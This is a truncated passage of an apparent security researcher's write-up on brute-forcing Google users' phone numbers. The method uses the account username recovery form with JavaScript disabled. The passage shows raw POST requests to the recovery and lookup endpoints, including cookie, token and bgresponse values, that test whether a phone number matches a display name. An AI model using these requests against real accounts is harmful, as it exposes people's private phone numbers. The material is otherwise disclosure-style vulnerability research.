< Back Bruteforcing the phone number of any Google user 2025-06-09 A few months ago, I disabled javascript on my browser while testing if there were any Google services left that still worked without JS in the modern web. Interestingly enough, the username recovery form still worked! This surprised me, as I used to think these account recovery forms required javascript since 2018 as they relied on botguard solutions generated from heavily obfuscated proof-of-work javascript code for anti-abuse. A deeper look into the endpoints The username recovery form seemed to allow you to check if a recovery email or phone number was associated with a specific display name. This required 2 HTTP requests: Request POST /signin/usernamerecovery HTTP/2 Host: accounts.google.com Cookie: __Host-GAPS=1:a4zTWE1Z3InZb82rIfoPe5aRzQNnkg:0D49ErWahX1nGW0o Content-Length: 81 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Email=+18085921029&hl=en&gxf=AFoagUVs61GL09C_ItVbtSsQB4utNqVgKg%3A1747557783359 The cookie and gxf values are from the initial page HTML Response HTTP/2 302 Found Content-Type: text/html; charset=UTF-8 Location: https://accounts.google.com/signin/usernamerecovery/name?ess=..<SNIP>..&hl=enThis gave us a ess value tied to that phone number we can use for the next HTTP request. Request POST /signin/usernamerecovery/lookup HTTP/2 Host: accounts.google.com Cookie: __Host-GAPS=1:a4zTWE1Z3InZb82rIfoPe5aRzQNnkg:0D49ErWahX1nGW0o Origin: https://accounts.google.com Content-Type: application/x-www-form-urlencoded Priority: u=0, i challengeId=0&challengeType=28&ess=<snip>&bgresponse=js_disabled&GivenName=john&FamilyName=smithThis request allows us to check if a Google account exists with that phone number as well as the display name "John Smith". Response (no account found) HTTP/2 302 Found Content-Type: text/html; charset=UTF-8 Locati...
First seen: 2025-06-09 14:18
Last seen: 2025-06-09 19:19